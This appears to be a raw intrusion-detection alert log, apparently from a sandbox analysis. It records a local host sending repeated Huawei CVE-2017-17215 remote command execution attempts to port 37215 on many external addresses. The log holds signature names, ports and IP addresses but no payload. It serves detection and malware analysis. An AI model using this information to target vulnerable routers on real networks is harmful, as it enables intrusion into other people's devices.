                                                        06/13/24-21:32:15.631835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740037215192.168.2.14156.108.51.42
                                                        06/13/24-21:32:50.628825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721437215192.168.2.1441.223.182.111
                                                        06/13/24-21:32:25.994292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137837215192.168.2.1441.164.202.239
                                                        06/13/24-21:32:07.400596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118837215192.168.2.1441.204.17.84
                                                        06/13/24-21:33:07.042982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181237215192.168.2.1441.248.146.69
                                                        06/13/24-21:32:42.422507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3580637215192.168.2.14156.28.55.118
                                                        06/13/24-21:32:58.823970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4483637215192.168.2.14197.46.12.5
                                                        06/13/24-21:32:50.633180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761437215192.168.2.1441.204.155.53
                                                        06/13/24-21:32:52.655263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605237215192.168.2.14156.219.211.37
                                                        06/13/24-21:32:34.192419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344437215192.168.2.14156.243.220.111
                                                        06/13/24-21:32:32.165259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165837215192.168.2.14197.114.114.171
                                                        06/13/24-21:32:32.168616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352637215192.168.2.14197.22.240.73
                                                        06/13/24-21:32:13.567425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4099037215192.168.2.14197.228.237.235
                                                        06/13/24-21:32:25.978594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142037215192.168.2.14156.226.215.53
                                                        06/13/24-21:33:15.273971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671837215192.168.2.14197.74.43.103
                                                        06/13/24-21:33:13.213255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063437215192.168.2.14156.139.7.58
                                                        06/13/24-21:32:58.821460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047237215192.168.2.1441.32.195.224
                                                        06/13/24-21:32:44.454384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964037215192.168.2.14197.73.27.182
                                                        06/13/24-21:32:56.783576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457437215192.168.2.14197.116.11.173
                                                        06/13/24-21:32:40.354477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217837215192.168.2.14156.92.218.148
                                                        06/13/24-21:32:03.274847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5678437215192.168.2.14156.120.5.105
                                                        06/13/24-21:33:09.091128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515637215192.168.2.14156.83.71.187
                                                        06/13/24-21:33:09.109872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211437215192.168.2.14156.162.182.46
                                                        06/13/24-21:32:05.349756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5054437215192.168.2.14197.215.243.44
                                                        06/13/24-21:32:48.553601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4527637215192.168.2.14156.198.236.204
                                                        06/13/24-21:32:21.803137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5640037215192.168.2.1441.64.84.108
                                                        06/13/24-21:32:34.194632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158437215192.168.2.14156.236.231.166
                                                        06/13/24-21:32:40.375997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452437215192.168.2.14156.164.51.128
                                                        06/13/24-21:32:50.614892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306437215192.168.2.14197.12.214.190
                                                        06/13/24-21:33:13.231520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092437215192.168.2.14156.129.219.143
                                                        06/13/24-21:32:15.636222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166837215192.168.2.1441.144.172.70
                                                        06/13/24-21:32:15.632941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4483637215192.168.2.14156.189.139.242
                                                        06/13/24-21:32:46.503392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4044037215192.168.2.14156.143.107.186
                                                        06/13/24-21:33:09.107444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3805237215192.168.2.1441.13.76.203
                                                        06/13/24-21:32:46.503588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582837215192.168.2.14156.180.158.122
                                                        06/13/24-21:31:57.134530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326237215192.168.2.14197.115.242.159
                                                        06/13/24-21:32:42.419577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834037215192.168.2.1441.4.61.157
                                                        06/13/24-21:31:59.175668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4632637215192.168.2.14156.230.224.2
                                                        06/13/24-21:33:09.128500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544837215192.168.2.14197.130.49.142
                                                        06/13/24-21:32:36.246967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3847437215192.168.2.14156.20.139.31
                                                        06/13/24-21:32:48.554586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612237215192.168.2.14156.137.108.45
                                                        06/13/24-21:32:13.568704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552637215192.168.2.1441.164.176.142
                                                        06/13/24-21:32:44.454980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437837215192.168.2.1441.73.218.225
                                                        06/13/24-21:32:42.425001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833437215192.168.2.1441.14.158.74
                                                        06/13/24-21:32:07.403247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923037215192.168.2.14197.59.157.75
                                                        06/13/24-21:32:36.242656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5809037215192.168.2.1441.54.249.180
                                                        06/13/24-21:31:57.136474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959837215192.168.2.14156.70.232.219
                                                        06/13/24-21:33:15.256748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4286837215192.168.2.1441.108.198.137
                                                        06/13/24-21:32:21.784535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689437215192.168.2.14197.219.48.128
                                                        06/13/24-21:32:25.991738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967237215192.168.2.14156.225.55.198
                                                        06/13/24-21:32:32.168916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519837215192.168.2.14197.187.43.236
                                                        06/13/24-21:33:09.129938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283037215192.168.2.14197.158.9.212
                                                        06/13/24-21:32:54.707693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755837215192.168.2.14156.6.102.235
                                                        06/13/24-21:33:07.039000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452437215192.168.2.14156.109.232.28
                                                        06/13/24-21:32:40.359895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003637215192.168.2.1441.82.211.46
                                                        06/13/24-21:32:03.295169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002837215192.168.2.14156.25.200.5
                                                        06/13/24-21:32:52.659855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358037215192.168.2.1441.164.125.234
                                                        06/13/24-21:32:01.222065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530837215192.168.2.14156.208.31.66
                                                        06/13/24-21:32:56.756418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3602837215192.168.2.14156.9.170.112
                                                        06/13/24-21:32:11.505623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5107637215192.168.2.14197.192.13.207
                                                        06/13/24-21:32:25.995157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814037215192.168.2.1441.156.228.156
                                                        06/13/24-21:32:30.122968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4180837215192.168.2.14156.221.171.199
                                                        06/13/24-21:32:38.323344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348037215192.168.2.14197.213.6.37
                                                        06/13/24-21:32:19.754509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061037215192.168.2.14197.94.35.228
                                                        06/13/24-21:33:15.257881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626637215192.168.2.14156.115.121.125
                                                        06/13/24-21:31:57.093671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039837215192.168.2.1441.116.113.130
                                                        06/13/24-21:32:07.402151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612637215192.168.2.14197.148.45.91
                                                        06/13/24-21:32:38.304315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664837215192.168.2.14197.80.126.178
                                                        06/13/24-21:32:30.100832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674237215192.168.2.14156.133.192.2
                                                        06/13/24-21:32:03.276871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5245837215192.168.2.14156.150.6.110
                                                        06/13/24-21:32:54.726268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410437215192.168.2.14197.119.157.122
                                                        06/13/24-21:31:59.176913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5007837215192.168.2.14156.72.43.213
                                                        06/13/24-21:33:11.160621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5847237215192.168.2.14197.135.96.220
                                                        06/13/24-21:33:05.014767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142037215192.168.2.14197.178.206.231
                                                        06/13/24-21:33:15.252792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850037215192.168.2.14156.214.249.48
                                                        06/13/24-21:32:07.404449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960237215192.168.2.1441.132.157.190
                                                        06/13/24-21:33:13.212017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464437215192.168.2.1441.151.201.86
                                                        06/13/24-21:32:44.474209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4007037215192.168.2.1441.144.20.70
                                                        06/13/24-21:32:25.972013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3519437215192.168.2.1441.164.53.127
                                                        06/13/24-21:32:13.543590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844837215192.168.2.14156.202.100.72
                                                        06/13/24-21:32:42.423672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333237215192.168.2.1441.118.220.67
                                                        06/13/24-21:33:09.129315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3683637215192.168.2.14156.245.212.222
                                                        06/13/24-21:32:44.452773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921437215192.168.2.14156.85.21.215
                                                        06/13/24-21:32:09.458696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5532237215192.168.2.1441.2.171.203
                                                        06/13/24-21:32:32.150677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3858637215192.168.2.14197.106.190.28
                                                        06/13/24-21:32:03.304143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226237215192.168.2.14197.54.214.186
                                                        06/13/24-21:32:15.609145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441437215192.168.2.1441.16.5.54
                                                        06/13/24-21:33:17.307343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4123837215192.168.2.14156.40.210.248
                                                        06/13/24-21:32:13.546716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4620237215192.168.2.14156.135.100.127
                                                        06/13/24-21:32:01.224495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975637215192.168.2.14156.38.225.89
                                                        06/13/24-21:32:03.301456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019037215192.168.2.14197.255.141.127
                                                        06/13/24-21:32:17.671150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5144837215192.168.2.14156.123.62.171
                                                        06/13/24-21:33:13.212250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5472837215192.168.2.1441.48.92.180
                                                        06/13/24-21:32:30.125385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411437215192.168.2.14197.195.12.175
                                                        06/13/24-21:33:15.276928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5464237215192.168.2.14156.124.253.220
                                                        06/13/24-21:32:23.834227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348237215192.168.2.14156.232.7.149
                                                        06/13/24-21:32:52.670665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5561037215192.168.2.14156.163.86.133
                                                        06/13/24-21:33:09.090364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118437215192.168.2.14197.17.202.10
                                                        06/13/24-21:32:30.127909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533437215192.168.2.14197.110.228.145
                                                        06/13/24-21:31:59.177430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769237215192.168.2.14197.42.1.88
                                                        06/13/24-21:32:03.274815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3614237215192.168.2.14156.98.217.11
                                                        06/13/24-21:32:21.784374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411237215192.168.2.14197.28.188.211
                                                        06/13/24-21:32:30.093868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932237215192.168.2.1441.234.162.17
                                                        06/13/24-21:32:36.264488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948237215192.168.2.14156.177.38.2
                                                        06/13/24-21:32:56.782804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4476837215192.168.2.1441.88.202.119
                                                        06/13/24-21:32:13.544337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483437215192.168.2.14156.159.119.117
                                                        06/13/24-21:32:15.633444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692037215192.168.2.14197.211.213.248
                                                        06/13/24-21:33:00.872646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810637215192.168.2.14197.148.185.123
                                                        06/13/24-21:33:07.057700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704437215192.168.2.1441.172.218.208
                                                        06/13/24-21:32:15.608327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4525837215192.168.2.1441.92.47.34
                                                        06/13/24-21:33:04.989780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5329437215192.168.2.14197.246.127.58
                                                        06/13/24-21:32:44.454229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794037215192.168.2.14197.193.255.226
                                                        06/13/24-21:32:44.457060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5914037215192.168.2.14156.49.245.104
                                                        06/13/24-21:32:13.543702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997637215192.168.2.1441.90.74.87
                                                        06/13/24-21:32:40.356253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999637215192.168.2.1441.210.125.1
                                                        06/13/24-21:32:01.239972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223837215192.168.2.14156.188.13.29
                                                        06/13/24-21:33:04.990859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877437215192.168.2.1441.244.30.234
                                                        06/13/24-21:33:00.889402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5978237215192.168.2.14197.150.110.32
                                                        06/13/24-21:33:09.128048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235237215192.168.2.14197.2.80.1
                                                        06/13/24-21:31:57.092985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774637215192.168.2.1441.17.104.98
                                                        06/13/24-21:32:54.707244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4358237215192.168.2.14197.30.5.255
                                                        06/13/24-21:32:42.419770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223237215192.168.2.14156.79.174.71
                                                        06/13/24-21:32:23.934174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509037215192.168.2.14156.167.170.211
                                                        06/13/24-21:32:01.241236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786437215192.168.2.1441.54.235.110
                                                        06/13/24-21:32:23.836451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5424437215192.168.2.14156.62.244.156
                                                        06/13/24-21:32:40.355299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3949837215192.168.2.14156.230.142.125
                                                        06/13/24-21:32:52.677464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219237215192.168.2.1441.57.116.32
                                                        06/13/24-21:32:21.804902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6080837215192.168.2.14197.186.46.238
                                                        06/13/24-21:32:01.218533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115037215192.168.2.14156.20.102.181
                                                        06/13/24-21:32:13.543758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338837215192.168.2.14197.37.227.66
                                                        06/13/24-21:32:52.677650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313437215192.168.2.14156.214.148.104
                                                        06/13/24-21:31:59.174243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079637215192.168.2.14156.107.63.120
                                                        06/13/24-21:32:09.457263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025437215192.168.2.1441.24.147.245
                                                        06/13/24-21:32:40.353161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437237215192.168.2.14156.16.195.5
                                                        06/13/24-21:33:15.273541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582437215192.168.2.1441.136.41.159
                                                        06/13/24-21:32:11.485484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817437215192.168.2.14156.111.160.72
                                                        06/13/24-21:32:58.821299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5185237215192.168.2.14197.239.36.147
                                                        06/13/24-21:32:21.783923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462637215192.168.2.14197.160.43.122
                                                        06/13/24-21:33:11.157851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4977637215192.168.2.14197.199.19.117
                                                        06/13/24-21:32:44.480708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331037215192.168.2.14197.63.94.224
                                                        06/13/24-21:32:52.655392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788837215192.168.2.14156.10.52.196
                                                        06/13/24-21:33:00.871470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3383837215192.168.2.14156.23.152.210
                                                        06/13/24-21:32:23.834765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842237215192.168.2.1441.206.19.139
                                                        06/13/24-21:32:03.279062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597837215192.168.2.14156.217.252.15
                                                        06/13/24-21:33:15.258197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308637215192.168.2.14156.57.205.118
                                                        06/13/24-21:32:58.824653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812837215192.168.2.14197.11.61.201
                                                        06/13/24-21:32:03.277570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628037215192.168.2.14156.2.71.33
                                                        06/13/24-21:32:03.307359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864237215192.168.2.14156.57.209.27
                                                        06/13/24-21:32:42.406674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544037215192.168.2.14197.212.174.132
                                                        06/13/24-21:32:28.028368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422637215192.168.2.1441.12.123.199
                                                        06/13/24-21:32:21.786793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4027837215192.168.2.1441.82.24.216
                                                        06/13/24-21:32:09.457534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861837215192.168.2.14197.149.73.94
                                                        06/13/24-21:31:57.092782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823837215192.168.2.14197.164.250.121
                                                        06/13/24-21:33:09.128147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5402237215192.168.2.1441.170.96.114
                                                        06/13/24-21:31:57.131375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644637215192.168.2.14156.113.7.72
                                                        06/13/24-21:32:17.670621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3300437215192.168.2.1441.4.106.202
                                                        06/13/24-21:33:04.988528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895637215192.168.2.14156.28.46.81
                                                        06/13/24-21:31:59.200085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531237215192.168.2.1441.84.165.58
                                                        06/13/24-21:32:36.269572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751437215192.168.2.14197.206.59.222
                                                        06/13/24-21:32:40.359846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032237215192.168.2.14156.105.99.132
                                                        06/13/24-21:33:11.160004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364637215192.168.2.14156.76.8.109
                                                        06/13/24-21:32:36.245293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723037215192.168.2.1441.129.16.133
                                                        06/13/24-21:32:40.356450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947837215192.168.2.1441.106.157.150
                                                        06/13/24-21:32:21.802617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489437215192.168.2.14156.133.34.147
                                                        06/13/24-21:32:36.262682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654437215192.168.2.1441.89.207.121
                                                        06/13/24-21:32:50.632551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5299637215192.168.2.1441.57.158.143
                                                        06/13/24-21:32:54.710249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554437215192.168.2.14197.53.187.62
                                                        06/13/24-21:33:02.954075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794037215192.168.2.1441.46.59.194
                                                        06/13/24-21:33:09.091469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833637215192.168.2.14197.135.190.117
                                                        06/13/24-21:33:17.308428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342037215192.168.2.14156.93.197.48
                                                        06/13/24-21:32:58.838901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4807837215192.168.2.14156.108.23.84
                                                        06/13/24-21:33:15.256940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737837215192.168.2.1441.178.238.126
                                                        06/13/24-21:32:25.969269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663437215192.168.2.1441.41.25.153
                                                        06/13/24-21:32:44.454551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4232837215192.168.2.1441.23.55.161
                                                        06/13/24-21:32:44.455258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819637215192.168.2.14156.102.148.47
                                                        06/13/24-21:32:03.279997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999837215192.168.2.14156.224.187.4
                                                        06/13/24-21:32:30.098483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874037215192.168.2.1441.123.49.243
                                                        06/13/24-21:32:21.781277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6023637215192.168.2.14197.131.116.6
                                                        06/13/24-21:33:15.257263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5735037215192.168.2.14156.91.221.54
                                                        06/13/24-21:32:52.669910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055637215192.168.2.1441.117.62.203
                                                        06/13/24-21:31:59.175094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6017437215192.168.2.1441.211.73.143
                                                        06/13/24-21:32:48.573578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779037215192.168.2.1441.168.68.240
                                                        06/13/24-21:33:11.172944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793237215192.168.2.14197.103.213.173
                                                        06/13/24-21:32:54.725351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926237215192.168.2.1441.122.174.242
                                                        06/13/24-21:32:09.436589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5666037215192.168.2.14197.252.17.38
                                                        06/13/24-21:32:30.098272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697437215192.168.2.14197.243.233.193
